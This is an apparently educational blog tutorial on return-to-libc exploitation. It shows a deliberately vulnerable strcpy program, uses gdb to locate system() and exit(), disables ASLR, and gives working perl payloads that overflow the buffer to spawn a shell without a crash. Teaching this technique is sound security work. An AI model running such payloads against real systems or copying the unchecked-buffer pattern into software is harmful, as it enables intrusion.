Return-to-libc

(This is part of my series on program vulnerability exploitation.)

So far, our method of code execution has been to write shellcode on the stack and execute it from there. Since there is normally no reason for a program to execute anything on the stack, an obvious countermeasure was to make the stack non-executable. Indeed, if you omit the -z execstack flag when compiling the programs from the previous two posts, the attacks fail with a segmentation fault. So executing code on the stack is no longer possible.

A new method, now referred to as return-to-libc (or ret2libc for short), was introduced by Solar Designer in 1997. As its name implies, instead of overwriting the return address of our vulnerable function with an address on the stack, we will overwrite it with the address of a libc function. The libc library contains all the standard functions such as printf() and exit(), so there is almost surely a function in it that does what we need.

Theory

Some reminders about the stack. Just after a function has returned, the stack looks like this:

|                | 
+================+
|                |   old frame of the function
|                |   (no longer part of the stack)
|                |
+================+   the old return address is also no longer
| return address |   part of the stack
+----------------+
|                | <- esp (top of the stack)
|                |
|                |   frame of the caller
+----------------+
| old ebp        | <- ebp
+================+
|                |

and on the other hand, just after a function has been called, the stack looks like this:

|                | 
+================+
| return address | <- esp (top of the stack)
+----------------+
| argument 1     |
+----------------+
| argument 2     |
+----------------+     frame of the caller
| ...            |
+----------------+
| argument n     |
+----------------+
| other data     |
|                |
|                | <- ebp
+================+
|                |

If we jump to a function, for example by writing its address over the return address of a vulnerable function, the function cannot tell that it was not called in the standard way, and it will expect the stack to have the usual layout shown above. Concretely, suppose we overwrite the return address of a function foo() with the address of another function bar(). Just after foo() returns into bar(), the two “views” of the stack above coincide: the word at esp, which bar() takes to be its return address, is the word that followed foo()'s return address, and the words after it are taken as bar()'s arguments. So we know how to pass parameters to bar(), and even how to choose where it will jump once it has finished: right after the overwritten return address of foo() (which now holds the address of bar()), we write the return address of bar(), and then its arguments.

Practice

We will again be exploiting this program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vuln(char *s)
{
    char buffer[64];
    strcpy(buffer, s);
}

int main(int argc, char **argv)
{
    if (argc == 1) {
        fprintf(stderr, "Enter a string!\n");
        exit(EXIT_FAILURE);
    }
    vuln(argv[1]);
}

but this time we compile it without -z execstack. As before, we need to write 76 bytes into buffer before reaching the return address. We will also disable ASLR, since it makes our lives much harder.

First, we need to find the address where the code of system() is located. This address varies between systems, but (if ASLR is disabled) it stays constant on a given system until libc is recompiled. We can obtain it, for example, with a dummy program and gdb:

$ cat system.c                  
#include <stdlib.h>

int main(void)
{
    system("/bin/sh");
    return 0;
}
$ gcc -m32 -g -o system system.c 
$ gdb ./system 
Reading symbols from /home/.../system...done.
(gdb) start
Temporary breakpoint 1 at 0x80483ed: file system.c, line 5.
Starting program: /home/.../system 

Temporary breakpoint 1, main () at system.c:5
5           system("/bin/sh");
(gdb) print system
$1 = {<text variable, no debug info>} 0xf7e5a430 <system>

So the address of system() is 0xf7e5a430; this is what we will write as our return address.

Next, system() takes a single argument: a string containing the command to run, in our case /bin/sh. This is a bigger problem: how do we obtain the address of a string containing /bin/sh? The easiest way, when ASLR is disabled, is to put it in an environment variable. Environment variables are stored at the bottom of the stack (higher addresses), and, as we can see below, their addresses are also randomized by ASLR:

$ cat useraddr.c 
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char *p = getenv("USER");
    printf("USER is at %p\n", p);
    return 0;
}
$ gcc -m32 -o useraddr useraddr.c                      
$ echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
1
$ ./useraddr 
USER is at 0xffbb3f64
$ ./useraddr
USER is at 0xffcb2f64
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
$ ./useraddr                                           
USER is at 0xffffdf64
$ ./useraddr
USER is at 0xffffdf64

We also see that the address of a given environment variable does not change if the program is recompiled:

$ gcc -m32 -o useraddr useraddr.c              
$ ./useraddr                     
USER is at 0xffffdf64

and that it does not depend on the size of the program's code either:

$ cat useraddr.c
#include <stdio.h>
#include <stdlib.h>

int plusone(int a)
{
    return a+1;
}

int add(int a, int b)
{
    int i;
    int res = a;
    for (i = 0; i<b; i++) {
        res = plusone(res);
    }
    return res;
}

int mult(int a, int b)
{
    int i;
    int res = 0;
    for (i = 0; i<b; i++) {
        res = add(res, a);
    }
    return res;
}

int main(int argc, char **argv)
{
    printf("3x2 = %d\n", mult(3, 2));
    char *p = getenv("USER");
    printf("USER is at %p\n", p);
    return 0;
}
$ gcc -m32 -o useraddr useraddr.c
$ ./useraddr
3x2 = 6
USER is at 0xffffdf64

It does, however, depend on the length of the program's name:

$ cp useraddr useraddrrrrrrrrrrrrrrrrrrrrr
$ ./useraddrrrrrrrrrrrrrrrrrrrrr 
3x2 = 6
USER is at 0xffffdf3c
$ cp useraddr 12345678
$ ./12345678
3x2 = 6
USER is at 0xffffdf64

Where does that leave us? We know that, as long as the names of two programs have the same length (and they are run with the same environment), a given environment variable will be at the same address in both programs. So we first define a dummy environment variable containing our string /bin/sh:

$ export BINSH="/bin/sh"

Our vulnerable program is named vuln8, so we create a dummy program with a five-character name, binsh, which prints the address of the environment variable BINSH:

$ cat binsh.c 
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char *p = getenv("BINSH");
    printf("BINSH is at %p\n", p);
    return 0;
}
$ gcc -m32 -o binsh binsh.c 
$ ./binsh
BINSH is at 0xffffdfe8

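We now have everything we need: the address of system() is 0xf7e5a430 and the address of its first argument is 0xffffdfe8. So our input consists of 76 filler bytes, then the address of system() in little-endian byte order, then four more filler bytes in the slot that system() will use as its return address, and finally the address of the string /bin/sh: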

$ ./vuln8 $(perl -e 'print "1"x76 . "\x30\xa4\xe5\xf7" . "1"x4 . "\xe8\xdf\xff\xff"')
sh-4.2$ exit
zsh: segmentation fault  ./vuln8 
$

We get a segmentation fault when we exit the shell (why?), but the attack works. The next section explains the segfault and how to avoid it, so don’t read it yet if you want to work it out yourself.

Exiting cleanly

As before, we call the vulnerable function foo(), and the function whose address we wrote over the return address of foo() bar(). As we saw, the word immediately after the return address of foo() is the return address of bar(). In our case, it is therefore the address where execution jumps when system() returns, that is, when we exit our shell. Since we put junk data there ("1111", i.e. 0x31313131), the processor jumps to an invalid address, causing a segfault.

It might be desirable to avoid the segfault, for instance so as not to arouse the user's suspicion; to do that, we need to write a valid address there instead. What should we write? If all we wanted was to spawn a shell, we have already achieved that, so there is nothing more to do, and it seems appropriate to call exit() to terminate the program. We obtain the address of exit() in the same way we obtained the address of system():

$ cat exit.c 
#include <stdlib.h>

int main(void)
{
    exit(0);
}
$ gcc -m32 -o exit exit.c 
$ gdb ./exit 
Reading symbols from /home/.../exit...(no debugging symbols found)...done.
(gdb) start
Temporary breakpoint 1 at 0x80483d7
Starting program: /home/.../exit 

Temporary breakpoint 1, 0x080483d7 in main ()
(gdb) print exit
$1 = {<text variable, no debug info>} 0xf7e4dfb0 <exit>
(gdb) 

So the address of exit() is 0xf7e4dfb0. We don’t need to care about its argument, since exit() terminates the program whatever value it receives (only the exit status is affected). Replacing the four filler bytes with this address, we obtain:

$ ./vuln8 $(perl -e 'print "1"x76 . "\x30\xa4\xe5\xf7" . "\xb0\xdf\xe4\xf7" . "\xe8\xdf\xff\xff"')
sh-4.2$ exit
$
